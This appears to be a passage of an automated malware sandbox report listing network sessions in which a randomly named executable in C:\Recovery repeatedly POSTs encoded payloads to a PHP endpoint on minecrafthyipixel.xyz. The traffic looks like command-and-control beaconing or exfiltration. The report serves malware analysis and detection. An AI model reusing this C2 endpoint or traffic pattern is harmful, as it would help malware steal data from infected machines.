                                                                                                                                    Apr 19, 2024 13:43:27.965290070 CEST2512OUTData Raw: 52 58 5e 5d 59 41 54 59 5c 5e 59 59 57 51 58 52 54 53 5f 5f 54 55 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^]YATY\^YYWQXRTS__TUSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-)6<Y$ 3'+*>?]%9;%; )8#Z /8[-$[. X =
                                                                                                                                    Apr 19, 2024 13:43:28.227858067 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:28 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nn4btTvl05%2B5qhFP%2FB99kSUcDYdueBsQVWfw9BCoJY0BkD8NrWemJN1qdtl2GGe4S03sCTLAXpsKw6gLm5GaeD2yax%2B3KBNnLAfoxno1mWhVdM95McNiqNcK8NCRceFISBOMJG5ehHs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3177a3d7bae-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:28.227886915 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    86192.168.2.449835104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:28.455799103 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:28.560292959 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:28.560431004 CEST2512OUTData Raw: 52 5d 5e 5f 5c 40 51 5d 5c 5e 59 59 57 51 58 5c 54 57 5f 5c 54 5e 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^_\@Q]\^YYWQX\TW_\T^S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[&=!(Y'0$$]))8;2:0S$; "!)]"/$/5$[. X =
                                                                                                                                    Apr 19, 2024 13:43:28.909697056 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:28 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jhWpu1IN7csxWNJmJhvwC%2BSE3VwzNWm8fXo%2FNPjdgGD1e2VztS9QHvO%2BZmO0w1itOymo%2BjT%2Fpp87ZGsD77Tc76c3GRYk90g3mlhh7oHA13cKY2aOfHC8wDoU8TYDY5r0yr%2FxtmWrf3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca31b2f3653c8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:28.909761906 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    87192.168.2.449836104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:29.139802933 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:29.244271994 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:29.244447947 CEST2512OUTData Raw: 52 58 5b 5b 5c 40 51 5e 5c 5e 59 59 57 51 58 5d 54 50 5f 5d 54 55 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX[[\@Q^\^YYWQX]TP_]TUSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%-"400'$8>=81:82.Q#6>;7Z#Z,95$[. X =
                                                                                                                                    Apr 19, 2024 13:43:29.515619040 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:29 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=adUZofNeKqtBTeGiSEJf6wmjpTAEIvnuOKrrFhi9SbD%2FwhFbz5TwN7IqXecHaOKI89uBS3vv2s8WRmYFTUatj9uRopr24MHikWV3ZbOeKmP%2FkJBj%2BV1jGmzDSySlZSJfqemejWQrsHU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca31f7fedadc5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:29.515662909 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    88192.168.2.449837104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:29.734255075 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:29.838352919 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:29.838499069 CEST2512OUTData Raw: 57 5c 5e 5b 59 44 54 55 5c 5e 59 59 57 55 58 5e 54 5a 5f 5f 54 5b 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^[YDTU\^YYWUX^TZ__T[SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&.T5;Y3#?\%;*;X&: &2W#)+;^ Z/.%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:30.220585108 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:30 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1GmXzqarGmX1WYWlMFjcDLQm78I0U9a6uzdsV03286uc2dmfSflAcqLaSP0TXiJ451nB5tgvR8SaOH9ouuHkr5f%2BvOHBhPBPJ8G9FLf5uiuAgprIaUTsJeWo6hV9Pa1x2WDEWKd9nA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca32328018bbb-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:30.220832109 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    89192.168.2.449838104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:30.483052969 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:30.587064981 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:30.587222099 CEST2512OUTData Raw: 52 58 5b 59 5c 40 51 59 5c 5e 59 59 57 52 58 5b 54 5b 5f 57 54 5b 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX[Y\@QY\^YYWRX[T[_WT[SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%"5;& 3[$(5W*&: 1" 26W)/"<$-5$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:30.847598076 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:30 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q7MCaVtLkH4K8szJ8KRBTOVeDtrdFgM9daO75ihUYdcH5nJo3SpSmocZEkvTBRKfRR6nD1%2Fv58QYD7F87C76Vaap7iGs5c8KiGrS6BcAkETBZ2Y7JSNWFg25KzLSGRa7egNphdsDkZs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca327da25b09f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:30.847640038 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    90192.168.2.449839104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:31.076318026 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:31.181094885 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:31.181261063 CEST2512OUTData Raw: 57 55 5e 59 5c 47 51 5f 5c 5e 59 59 57 52 58 5d 54 5a 5f 59 54 5c 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU^Y\GQ_\^YYWRX]TZ_YT\S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2==!73 $$+&*(+&(%% "-= ,8/%$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:31.555847883 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:31 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WCvOHodh5u5n6lbjparhpywPU9lnDCNHlJrkHd9ApoNKGmHX4I93mfTp8Vb0UJn%2FGt86hFEh0LbjytEMmzdFuvhvwRiv7ILrDoQWOJ95TbyaGDnK5n0KModU71afWxJwvUK5T1y%2FPAE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca32b98a86730-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:31.555908918 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    91192.168.2.449840104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:31.782316923 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:31.886909008 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:31.887115955 CEST2512OUTData Raw: 57 5f 5e 5a 59 44 54 5e 5c 5e 59 59 57 5e 58 59 54 53 5f 5d 54 5f 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_^ZYDT^\^YYW^XYTS_]T_SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'>2!(8'#'$82>;'%*018*R T5*+Z4Z,^-$[. X
                                                                                                                                    Apr 19, 2024 13:43:32.236135006 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:32 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2FKXbpOWlstoQTiRrwQoZSDIAojTyHjq5TYaZxEgMeZF0%2BL0Q6LkTt5XmeAy%2Fg5kHyLOyPHQ5NWKuJ6vWTYJv7jJQg6ayVYq1%2FqCUNw3ZqiLKQeHZV6yXj%2BaCNz7k8aHS7JUThzLKyU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca32fff546779-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:32.236185074 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    92192.168.2.449842104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:32.567759991 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2172
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:32.672477961 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:32.672622919 CEST2172OUTData Raw: 52 5f 5e 58 5c 43 54 54 5c 5e 59 59 57 50 58 5e 54 5a 5f 5b 54 54 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_^X\CTT\^YYWPX^TZ_[TTS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%=254'#$*>+]2?$+&P712>;/[7$\:5$[. X
                                                                                                                                    Apr 19, 2024 13:43:33.034478903 CEST766INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:32 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7GO9spD5XP%2BEbKz4vobrD4IKqL0A3BkuCC8HlPLr6zQU210CwSQYQUng%2Fnh66dCyBJJQaLRl8ITynkeZD4766lSaW6jpR2i1Fx41BkV8yFmzBtdn2Q7Z0EU6hEiPquPVVK6BGPzrIV0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca334ecea4527-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 1a 25 36 21 04 22 03 27 13 29 33 3e 5f 2a 0e 3d 15 3d 00 2e 04 20 3d 1d 0e 2f 39 3c 5c 3e 3b 04 5a 26 0a 22 0e 27 3e 38 51 32 30 21 59 00 1a 39 16 20 2c 08 04 2e 29 39 1c 3c 1f 3d 58 20 1c 06 02 2a 3d 3e 0d 20 06 01 16 3f 2d 3d 53 2c 28 0a 15 2b 01 3a 05 2f 09 2e 14 22 3b 2c 52 09 12 26 09 28 38 09 07 27 30 29 12 22 32 20 13 3c 3f 21 05 24 05 28 57 26 0d 3b 02 2c 21 21 09 25 00 36 0f 2a 2a 3f 0b 22 2c 22 0e 25 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$%6!"')3>_*==. =/9<\>;Z&"'>8Q20!Y9 ,.)9<=X *=> ?-=S,(+:/.";,R&(8'0)"2 <?!$(W&;,!!%6**?","%.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:33.034519911 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    93192.168.2.449843104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:32.687083006 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:32.791620016 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:32.791925907 CEST2512OUTData Raw: 57 5f 5e 55 5c 43 54 59 5c 5e 59 59 57 52 58 5e 54 5b 5f 5f 54 58 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_^U\CTY\^YYWRX^T[__TXS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'.!!]8$0$'8-)0&'&;.!"W)+Z4Z0^9$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:33.072165012 CEST613INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:33 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZ7itjL7NwnbKbKr4OAWaqIenKQHSjwoy49HsgypngTobAUM6NQC8zQqx9nltOig7tfwCPZt5QUQDtJ6CH84WFT6jeAPBwrX52J04RqGQzcvFnE10YrCbyqna3U1uSMXEOYgSiUQIjY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca335a98bb076-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:33.072201967 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    94192.168.2.449844104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:33.300807953 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
